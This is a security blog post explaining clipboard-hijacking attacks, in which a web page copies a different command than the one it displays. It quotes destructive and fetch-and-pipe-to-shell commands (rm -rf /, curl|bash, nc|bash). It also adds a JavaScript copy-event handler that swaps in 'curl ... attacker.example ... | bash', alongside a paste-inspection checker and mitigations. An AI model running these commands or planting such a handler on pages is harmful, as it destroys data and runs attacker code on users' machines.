Copy Paste Tricks back to their old tricks again

In an article on The H, they explain why it is not a good idea to simply copy and paste commands from a website tutorial: what looks like a harmless command can hide something very dangerous.

When a user pastes what they think is an innocent command, one that does what the page it came from advertises, a different command is actually executed, automatically and with the user's credentials. This could delete all of their data or ship it off to a server on the public internet. If the user still has a valid sudo session on a Linux machine, the command could even run with administrator privileges, with correspondingly worse results.

See the article here

User interaction based exploitation: WYSINWYC (What you see is not what you copy)

When working with computers you know whether or not there is a reliable and deterministic way to exploit them; indeed, when working with humans there is no certainty. Technical people often prefer to stay technical and avoid humans. This is in fact our first article which needs direct human interaction to work.

The presented technique relies on a special type of "rich text" copy where the apparently innocuous payload is pasted into a different context able to parse it. This is especially true of, but definitely not limited to, online how-tos.

The core concept of the attack is that the displayed text (and thus the data the user thinks they have copied) is different from what the browser has really copied.

A list of real-life examples follows, just to give you an idea.

Small commands:

rm -rf /
del /F /S /Q * # windows
/opt/custom/app abuse_my_functionality
echo "*" > ~/.rhosts # the rlogin/rsh trust file is ~/.rhosts (its actual wildcard is "+")

Remote storage over http

wget -q -O-|bash # URL left out
curl -s|bash # URL left out
echo -en "GET /\n\n"|nc 80|bash # target host left out

The shortest that comes to my mind is “GET|sh” (13 chars).

Other remote storage fetch methods

dig AXFR @evil-dns-with-53-tcp # zone name left out; zone transfers use TCP, so the answer is not limited to a single UDP datagram

As you can see, small commands are limited in terms of flexibility, and remote fetch/exec can be made useless by network protections (egress filtering, my-work-is-grep IDS) and configuration issues (missing routing, machine offline, personal firewall, etc.).

Excerpted from an article on
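As an added example, not code from this post or from the excerpted article, the JavaScript below shows the two sides of the mechanism both texts describe: a page-side copy handler that puts something other than the displayed command on the clipboard, and a small inspector a defender can run over clipboard text before a shell ever sees it. The command strings, the attacker host and the function names (hijackCopy, inspectPaste, fakeClipboardEvent) are constructed for the demo; the copy-event API (clipboardData.setData, preventDefault) is the standard browser one, and the stub event object exists only so the file also runs offline under Node.

```javascript
// Added example (not from the original post or the excerpted article):
// the page side of a WYSINWYC copy hijack, plus a paste inspector a
// defender can run on clipboard text before letting a shell see it.
// Function names, commands and the attacker host are assumptions.

// What the tutorial page visibly shows in its <code> block.
const SHOWN_COMMAND = 'sudo apt-get install -y htop';

// What the attacker wants executed first. The trailing newline matters:
// most terminals submit the line as soon as it is pasted, so the victim
// never gets a chance to read or delete it.
const HIDDEN_COMMAND = 'curl -s http://attacker.example/p | bash';

// Attacker side: a 'copy' event listener that replaces the selection.
// In a browser this is wired up with
//   document.addEventListener('copy', hijackCopy);
// It is written against the standard ClipboardEvent shape
// (event.clipboardData.setData, event.preventDefault) so it can also be
// exercised with a stub object under Node.
function hijackCopy(event) {
  const payload = HIDDEN_COMMAND + '\n' + SHOWN_COMMAND + '\n';
  event.clipboardData.setData('text/plain', payload);
  event.preventDefault(); // stop the browser from copying the real selection
  return payload;
}

// Minimal stand-in for a ClipboardEvent, used only for the offline demo.
function fakeClipboardEvent() {
  const store = {};
  return {
    clipboardData: {
      setData: (type, value) => { store[type] = value; },
      getData: (type) => store[type],
    },
    defaulted: false,
    preventDefault() { this.defaulted = true; },
  };
}

// Defender side: characters that make pasted text run, or hide part of it.
const DANGEROUS = [
  { re: /\n(?!$)/, why: 'embedded newline: extra command lines' },
  { re: /\n$/, why: 'trailing newline: runs as soon as it is pasted' },
  { re: /\r/, why: 'carriage return: overwrites what is on the line' },
  { re: /[\u200B-\u200F\u2028-\u202E\u2060-\u2064\uFEFF]/, why: 'zero-width or bidi control character' },
  { re: /[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/, why: 'terminal control character' },
];

// Returns the findings and the lines a shell would actually execute.
function inspectPaste(text) {
  const findings = DANGEROUS.filter(({ re }) => re.test(text)).map(({ why }) => why);
  const lines = text.split('\n').filter((l) => l.length > 0);
  return { safe: findings.length === 0, findings, lines };
}

// Demo: what the victim thinks they copied vs. what the shell receives.
const ev = fakeClipboardEvent();
const copied = hijackCopy(ev);
const report = inspectPaste(copied);
console.log('shown   :', SHOWN_COMMAND);
console.log('copied  :', JSON.stringify(copied));
console.log('findings:', report.findings);
console.log('lines   :', report.lines);
```

The variant shown here needs JavaScript on the page; the same effect is achieved with CSS alone by placing the hidden command in a span inside the code block that is positioned off-screen or given a zero font size, so that selecting the visible text also selects it. On the receiving side the cheapest mitigation is to paste into an editor first; readline-based shells can also be told to treat a paste as one unit with `set enable-bracketed-paste on` in ~/.inputrc, which stops an embedded newline from submitting the line.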
